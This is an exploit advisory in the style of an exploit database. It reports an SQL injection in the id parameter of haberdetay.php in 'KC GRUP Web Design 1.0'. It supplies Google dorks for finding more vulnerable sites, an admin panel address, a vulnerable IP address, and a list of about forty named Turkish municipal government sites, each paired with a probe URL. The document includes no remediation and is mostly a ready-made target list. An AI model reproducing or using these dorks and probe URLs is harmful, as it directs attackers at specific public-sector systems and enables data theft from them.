KC GRUP Web Design version 1.0 suffers from a remote SQL injection vulnerability.
4a961ba375685bf4edbb7386d1990d4e#################################################################################################
# Exploit Title : KC GRUP Web Design 1.0 SQL Injection
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security
Army
# Date : 03/12/2018
# Vendor Homepage : kcgrup.com ~ kcgrupsms.com
# Software Download Link : N/A
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 1.0
# Exploit Risk : Medium
# Google Dorks :
intext:''Copyright A(c) 2014-2018 Belediye - TA1/4m haklarA+- saklA+-dA+-r. - Design by
KC GRUP''
intext:Design by KC GRUP - Belediye Sitesi site:bel.tr
inurl:''/haberdetay.php?id=''
intext:Design by KC GRUP'' site:bel.tr
# Exploit4Arab Exploit Link : exploit4arab.org/exploits/2260
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements
used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Admin Panel Login Path :
panel.kcgrupsms.com
#################################################################################################
# SQL Injection Exploit :
/haberdetay.php?id=[SQL Injection]
#################################################################################################
# Example Vulnerable Sites =>
Turkish Government Official Municipality WebSites are vulnerable for this
security issue.
85.95.249.117 IP Address is vulnerable.
[+] guce.bel.tr/haberdetay.php?id=86%27
[+] kofcaz.bel.tr/haberdetay.php?id=86%27
[+] solhan.bel.tr/haberdetay.php?id=86%27
[+] tutak.bel.tr/haberdetay.php?id=86%27
[+] adakli.bel.tr/haberdetay.php?id=86%27
[+] meric.bel.tr/haberdetay.php?id=86%27
[+] karssusuz.bel.tr/haberdetay.php?id=86%27
[+] konuklar.bel.tr/haberdetay.php?id=86%27
[+] mazgirt.bel.tr/haberdetay.php?id=86%27
[+] kofcaz.bel.tr/haberdetay.php?id=86%27
[+] karliova.bel.tr/haberdetay.php?id=86%27
[+] saphane.bel.tr/haberdetay.php?id=86%27
[+] adakli.bel.tr/haberdetay.php?id=86%27
[+] kavakli.bel.tr/haberdetay.php?id=86%27
[+] balikoy.bel.tr/haberdetay.php?id=86%27
[+] duzici.bel.tr/haberdetay.php?id=86%27
[+] pazarlar.bel.tr/haberdetay.php?id=86%27
[+] yozgatdogankent.bel.tr/haberdetay.php?id=86%27
[+] corumortakoy.bel.tr/haberdetay.php?id=86%27
[+] cakirhuyuk.bel.tr/haberdetay.php?id=86%27
[+] deredolu.bel.tr/haberdetay.php?id=86%27
[+] gelendost.bel.tr/haberdetay.php?id=86%27
[+] sutculer.bel.tr/haberdetay.php?id=86%27
[+] akharim.bel.tr/haberdetay.php?id=86%27
[+] kazanci.bel.tr/haberdetay.php?id=86%27
[+] cakirhuyuk.bel.tr/haberdetay.php?id=86%27
[+] halfeli.bel.tr/haberdetay.php?id=86%27
[+] kovanlik.bel.tr/haberdetay.php?id=86%27
[+] sultanhani.bel.tr/haberdetay.php?id=86%27
[+] sambayat.bel.tr/haberdetay.php?id=86%27
[+] meric.bel.tr/haberdetay.php?id=86%27
[+] cimitekke.bel.tr/haberdetay.php?id=86%27
[+] uludere.bel.tr/haberdetay.php?id=86%27
[+] demirkoy.bel.tr/haberdetay.php?id=86%27
[+] bereketli.bel.tr/haberdetay.php?id=86%27
[+] uzgorur.bel.tr/haberdetay.php?id=86%27
[+] akpazar.bel.tr/haberdetay.php?id=86%27
[+] ardanuc.bel.tr/haberdetay.php?id=86%27
[+] guneyyurt.bel.tr/haberdetay.php?id=86%27
[+] olukozu.bel.tr/haberdetay.php?id=86%27
[+] buyukkalecik.bel.tr/haberdetay.php?id=86%27
[+] altinbasak.bel.tr/haberdetay.php?id=86%27
[+] hatipli.bel.tr/haberdetay.php?id=86%27
[+] cakirhuyuk.bel.tr/haberdetay.php?id=86%27
#################################################################################################
# Example SQL Database Error :
Warning: Cannot modify header information - headers already sent by (output
started at /home/guce/
public_html/baglan.php:7) in /home/guce/public_html/haberdetay.php on line
101
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################